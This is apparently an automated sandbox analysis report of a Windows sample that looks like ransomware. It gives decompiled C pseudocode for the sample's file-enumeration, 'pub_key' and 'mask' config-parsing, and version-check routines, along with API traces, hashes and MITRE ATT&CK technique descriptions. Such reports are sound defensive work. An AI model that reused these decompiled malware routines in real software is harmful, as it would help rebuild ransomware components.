lstrcmpW.KERNEL32(?,0FBCFEC8,?,?), ref: 0FBC6D1C
lstrcmpW.KERNEL32(?,0FBCFECC,?,?), ref: 0FBC6D36
lstrcatW.KERNEL32(00000000,?), ref: 0FBC6D48
lstrcatW.KERNEL32(00000000,0FBCFEFC), ref: 0FBC6D59

Part of subcall function 0FBC6C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBC6CC3
Part of subcall function 0FBC6C90: lstrcatW.KERNEL32(00000000,0FBCFEC4), ref: 0FBC6CDB
Part of subcall function 0FBC6C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBC6CE5

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FBC6DBD
FindClose.KERNEL32(00003000,?,?), ref: 0FBC6DCE

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: ba060cde93f8eb1b719529762300bd4d6eb23f0aaf75780e4b70778b350c72fa
Instruction ID: f3e64c98ae849ff43635e46c5b5ff7e08445e80eecf878f9c05022fc6f00b0a5
Opcode Fuzzy Hash: ba060cde93f8eb1b719529762300bd4d6eb23f0aaf75780e4b70778b350c72fa
Instruction Fuzzy Hash: 75012131A0021EAACB119B65EC48FEF7BB9EF48651F0040E9F949D6021DB359A519FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC3200 Relevance: 8.8, APIs: 7, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC3200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

APIs

lstrlenA.KERNEL32(0FBC52F0,00000000,?,0FBC52F1,?,0FBC34BF,0FBC52F1,00000001,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC3251
GetProcessHeap.KERNEL32(00000008,00000001,?,0FBC34BF,0FBC52F1,00000001,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC325B
HeapAlloc.KERNEL32(00000000,?,0FBC34BF,0FBC52F1,00000001,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC3262
lstrlenA.KERNEL32(0FBC52F0,00000000,?,0FBC52F1,?,0FBC34BF,0FBC52F1,00000001,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC3273
GetProcessHeap.KERNEL32(00000008,00000001,?,0FBC34BF,0FBC52F1,00000001,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC327D
HeapAlloc.KERNEL32(00000000,?,0FBC34BF,0FBC52F1,00000001,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC3284
lstrcpyA.KERNEL32(00000000,0FBC52F0,?,0FBC34BF,0FBC52F1,00000001,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC3293

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID:
API String ID: 511007297-0
Opcode ID: 7af34cbc571a2fda1e99d7c6d42723ac401ceafb3da176418939d429aed38411
Instruction ID: 31f4ff14c73a10a73981d25940c4d683fb37666ecae25f4e043b50d2d2658142
Opcode Fuzzy Hash: 7af34cbc571a2fda1e99d7c6d42723ac401ceafb3da176418939d429aed38411
Instruction Fuzzy Hash: A211B4300042486EDF202E69A4087A7BB9CEF07721FD8C0CAE8C5CF202C63994578FE1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC33E0 Relevance: 7.6, APIs: 5, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBC33E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0FBC32B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0FBC3320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0FBC3190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0FBC3200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x850f00e8
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

APIs

Part of subcall function 0FBC32B0: lstrlenA.KERNEL32(?,00000000,?,0FBC52F0,?,?,0FBC33F6,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC32C5
Part of subcall function 0FBC32B0: lstrlenA.KERNEL32(?,?,0FBC33F6,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC32EE

lstrlenA.KERNEL32(0FBC52F1,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC3484
GetProcessHeap.KERNEL32(00000008,00000001,?,0FBC52F0,00000000), ref: 0FBC348E
HeapAlloc.KERNEL32(00000000,?,0FBC52F0,00000000), ref: 0FBC3495
lstrcpyA.KERNEL32(00000000,0FBC52F1,?,0FBC52F0,00000000), ref: 0FBC34A7
ExitProcess.KERNEL32 ref: 0FBC34DB

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID:
API String ID: 1867342102-0
Opcode ID: 012875b84d83b317b47d3151172482e59fe536a0836dd101fc1ebf14a1156baa
Instruction ID: 9eba2743d1bdaef6689541a08085d30c778acb70889160cfe58fa9bbc01cab38
Opcode Fuzzy Hash: 012875b84d83b317b47d3151172482e59fe536a0836dd101fc1ebf14a1156baa
Instruction Fuzzy Hash: A331F1305042455AEB221F28B4447E7BBE9DB06710FDCC1CDE885CB283D62E68878FE1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC3B20 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0FBC3B72
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FBC3B96
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FBC3B9A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FBC3B9E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FBC3BC5

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: d4a00852a5cebd6500a794b04d38fe07c6b5458cadd0c099c6ee8b0f7eeccf53
Instruction ID: ad3f01d89b05b189f03bf8fb0168701193ebd1d88d03ca692e0f248f4a34ac48
Opcode Fuzzy Hash: d4a00852a5cebd6500a794b04d38fe07c6b5458cadd0c099c6ee8b0f7eeccf53
Instruction Fuzzy Hash: 28111EB0D4031C6EEB609F65DC1ABEB7ABCEB08700F0081D9A548E71C1D6B95B948FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC4CD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBC4CD0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xfbcfa84]");
				_t16 =  *0xfbcfa8c; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,0FBC5034), ref: 0FBC4D3D
lstrlenA.KERNEL32(00000000,?,0FBC5034), ref: 0FBC4D97
lstrcpyA.KERNEL32(?,?,?,0FBC5034), ref: 0FBC4DC8

Strings

fabian wosar <3, xrefs: 0FBC4D35

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: 0620d4b01e6fc7fd3c086fb2c035bba8e5e642a14b2a4ad6778c254874af808a
Instruction ID: 24584d7ff85e11bb3231f08bb5c8fe626eeeb465f9401ee0ddeaf992eb725907
Opcode Fuzzy Hash: 0620d4b01e6fc7fd3c086fb2c035bba8e5e642a14b2a4ad6778c254874af808a
Instruction Fuzzy Hash: F331D221A08299DACB32EE2874303FBBFB6EF47511B9855CDC8D15B207D2216E468FD0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC3190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC3190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

APIs

lstrcmpiA.KERNEL32(0FBC52F0,mask,0FBC52F1,?,?,0FBC3441,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC31B9
lstrcmpiA.KERNEL32(0FBC52F0,pub_key,?,0FBC3441,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC31D1

Strings

mask, xrefs: 0FBC31B1
pub_key, xrefs: 0FBC31BF

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: mask$pub_key
API String ID: 1586166983-1355590148
Opcode ID: a831aaba155606a8dab01d83c353a1a296d4bd6300b07491493f702842411650
Instruction ID: e9fc068ad1862e8ca3f422b07e9cfae03c352226274c44cfdbd7b97709b10d25
Opcode Fuzzy Hash: a831aaba155606a8dab01d83c353a1a296d4bd6300b07491493f702842411650
Instruction Fuzzy Hash: EEF04C713082881EF7154968BC457E3BBCDDB05B50FC840FFF6C5C6152C1AA98418BD4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report O8ZHhytWhn.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

